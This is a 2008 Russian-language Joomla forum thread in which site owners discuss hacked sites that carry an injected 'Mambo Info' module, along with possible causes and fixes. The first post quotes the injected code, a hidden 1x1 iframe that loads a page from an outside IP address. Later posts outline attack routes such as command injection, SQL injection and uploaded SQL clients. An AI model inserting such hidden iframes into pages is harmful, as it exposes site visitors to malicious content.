Mambo Info - еще одна уязвимость

Тема в разделе "Вопросы безопасности", создана пользователем AnthonyS, 20.07.2008.

  1. Offline

    AnthonyS Russian Joomla! Team

    Регистрация:
    07.08.2006
    Сообщения:
    273
    Симпатии:
    6
    Пол:
    Мужской
    Походу везет мне - сегодня перетаскивал сайты с хоста на хост, обнаружилось вот что:
    создан модуль "Mambo Info" в модуле код:
    Код (CODE):
    1. <!-- Traffic Statistics -->
    2. <iframe width="1" height="1" frameborder="0" src="http://61.155.8.157/iframe/wp-stats.php"></iframe> <!-- End Traffic Statistics -->

    нашел про это на http://forum.joomla.org/viewtopic.php?f=267&t=307092
    но так и не понял, решили там эту проблему или нет
     
  2.  
  3. sectus
    Offline

    sectus специалист

    Регистрация:
    19.04.2006
    Сообщения:
    1 210
    Симпатии:
    46
    Пол:
    Мужской
    Ответ: Mambo Info - еще одна уязвимость

    Вроде не решили, рекомендовали смотреть последние измененные файлы.
     
  4. Offline

    AnthonyS Russian Joomla! Team

    Регистрация:
    07.08.2006
    Сообщения:
    273
    Симпатии:
    6
    Пол:
    Мужской
    Ответ: Mambo Info - еще одна уязвимость

    Опять я первооткрыватель...
    Но могу заметить, все взломы, что мне встречались, происходили только на тех дерьмохостингах, где PHP файл с чмоД 640 можно запустить с браузера..
     
  5. Dead Krolik
    Offline

    Dead Krolik специалист

    Регистрация:
    13.04.2007
    Сообщения:
    3 688
    Симпатии:
    101
    Пол:
    Мужской
    Ответ: Mambo Info - еще одна уязвимость

    Хе-хе. Не везет тебе.

    Но я все равно думаю не из-за этого.
     
  6. Offline

    AnthonyS Russian Joomla! Team

    Регистрация:
    07.08.2006
    Сообщения:
    273
    Симпатии:
    6
    Пол:
    Мужской
    Ответ: Mambo Info - еще одна уязвимость

    да, нашел еще на одном сайте, а там хостинг уже приличный...
     
  7. Offline

    mikluho Недавно здесь

    Регистрация:
    15.06.2006
    Сообщения:
    8
    Симпатии:
    0
    Пол:
    Мужской
    Ответ: Mambo Info - еще одна уязвимость

    У меня проблема весьма похожая, но не совсем. Iframe засовывают во все подряд - в content, в modules. Технология примерно такова - в одну из папок с открытыми правами (типа cache или tmp) заливается файл с мини sql-клиентом, позволяющим выполнять простейшие запросы, и с него это все и делается. Честно говоря, пока нет идей, как закрыть эту дыру.
     
  8. sectus
    Offline

    sectus специалист

    Регистрация:
    19.04.2006
    Сообщения:
    1 210
    Симпатии:
    46
    Пол:
    Мужской
    Ответ: Mambo Info - еще одна уязвимость

    Закрыть доступ на запись соответствующих папок.
     
  9. Offline

    AnthonyS Russian Joomla! Team

    Регистрация:
    07.08.2006
    Сообщения:
    273
    Симпатии:
    6
    Пол:
    Мужской
    Re: Ответ: Mambo Info - еще одна уязвимость

    покажи, как выглядит этот клиент?

    Добавлено через 1 минуту
    у меня вроде бы все прикрыто..
    А - что если как временную меру, найти место, где происходит формирование команды "создать модуль" и закоменнтировать? Хоть передышка будет..
     
    Последнее редактирование: 06.08.2008
  10. Offline

    fragmarw Недавно здесь

    Регистрация:
    31.07.2007
    Сообщения:
    3
    Симпатии:
    0
    Пол:
    Мужской
    У меня такая же проблема, постоянно создаются модули Mambo Info что и где поменять, чтобы запретить изменение файлов.
     
  11. Offline

    AnthonyS Russian Joomla! Team

    Регистрация:
    07.08.2006
    Сообщения:
    273
    Симпатии:
    6
    Пол:
    Мужской
    Re: Ответ: Mambo Info - еще одна уязвимость

    подскажи чайнику, какие файлы\папки закрывать? глядел /modules - Но этот модуль где-то в другом месте.
     
  12. infoman
    Offline

    infoman Недавно здесь

    Регистрация:
    28.08.2007
    Сообщения:
    575
    Симпатии:
    12
    Пол:
    Мужской
    ну если модуль неимеет места быть в папке модулес то его нет физически и он лежит в базе
    тоесть это всёравно как создать простой виртуальный модуль простым хтмл редактором из админки :)
     
  13. infoman
    Offline

    infoman Недавно здесь

    Регистрация:
    28.08.2007
    Сообщения:
    575
    Симпатии:
    12
    Пол:
    Мужской
    а у меня появился модуль типа узер после установки шаблона :) сам посредством команды установочного файла
    причём он был выключен сам и вроде невключается содержание такое :
    <img style="margin-right: 10px" src="http://template15.joomlart.com/ja_corona/images/stories/demo/sam-9.gif" alt="Sample image" align="left" /> Lorem ipsum dolor sit amet consectetuer Vivamus ac Curabitur id malesuada. Lorem condimentum et libero hendrerit laoreet auctor mauris eget. <p style="color: #333333; margin-bottom: 0pt" class="tips">Lorem condimentum et libero hendrerit laoreet auctor mauris eget.</p>

    кто знает испанский?
     
  14. infoman
    Offline

    infoman Недавно здесь

    Регистрация:
    28.08.2007
    Сообщения:
    575
    Симпатии:
    12
    Пол:
    Мужской
    по поводу логики закрывания дыр в жумле то предлогаю делать так :
    да я ещё раз заведу разговор о секур-боте :)))))))))))))
    вот посматрите сами как правило любые весчи грузятся через index php
    буз него никуда
    как правило вскрытие сайта начинается 2-мя путями
    1) поиск шелподобных дыр с возможностью передавать на вход исполняющей функции команды из разряда system (помогает фильтрация но невсегда)
    2) sql инекции причём не банальные ' а мудро придуманные union ипр.....
    это через get и post запросы

    ещё один маловероятный способ более сложный это возможность заливки и переименования файла даже сквозь библиотеку обработки рисунка

    все это приводит к получению как доступа к базе (дефейс сайта )
    так и получению шела с правами apahe группы которая по умолчанию дана всем файлам созданным средствами php (дефейс и болеее......)

    как боротся:
    команд (параметров get post) группы system мы не используем практически никаких при работе j (wget, ls, la, ипр)
    команд (параметров get post) sql тоже практически не используется

    так почему бы непосредственно через бот не уничтожать любые подозрительные команды и параметры передаваемые извне

    ведь если компонент написан правильно то ниодин файл незагрузится непройдя через index.php (в составе жумлы)

    я прав?

    пс safe_mode позволяет избавится от проблемы с командами system но недаёт полноценно работать с админкой сайта (я имею ввиду установку расширений редактирование шаблона
     
    Последнее редактирование: 18.12.2008
  15. Offline

    AnthonyS Russian Joomla! Team

    Регистрация:
    07.08.2006
    Сообщения:
    273
    Симпатии:
    6
    Пол:
    Мужской
    оки, вот и вопрос - как это задизаблить?
     
  16. Dead Krolik
    Offline

    Dead Krolik специалист

    Регистрация:
    13.04.2007
    Сообщения:
    3 688
    Симпатии:
    101
    Пол:
    Мужской

Поделиться этой страницей

Загрузка...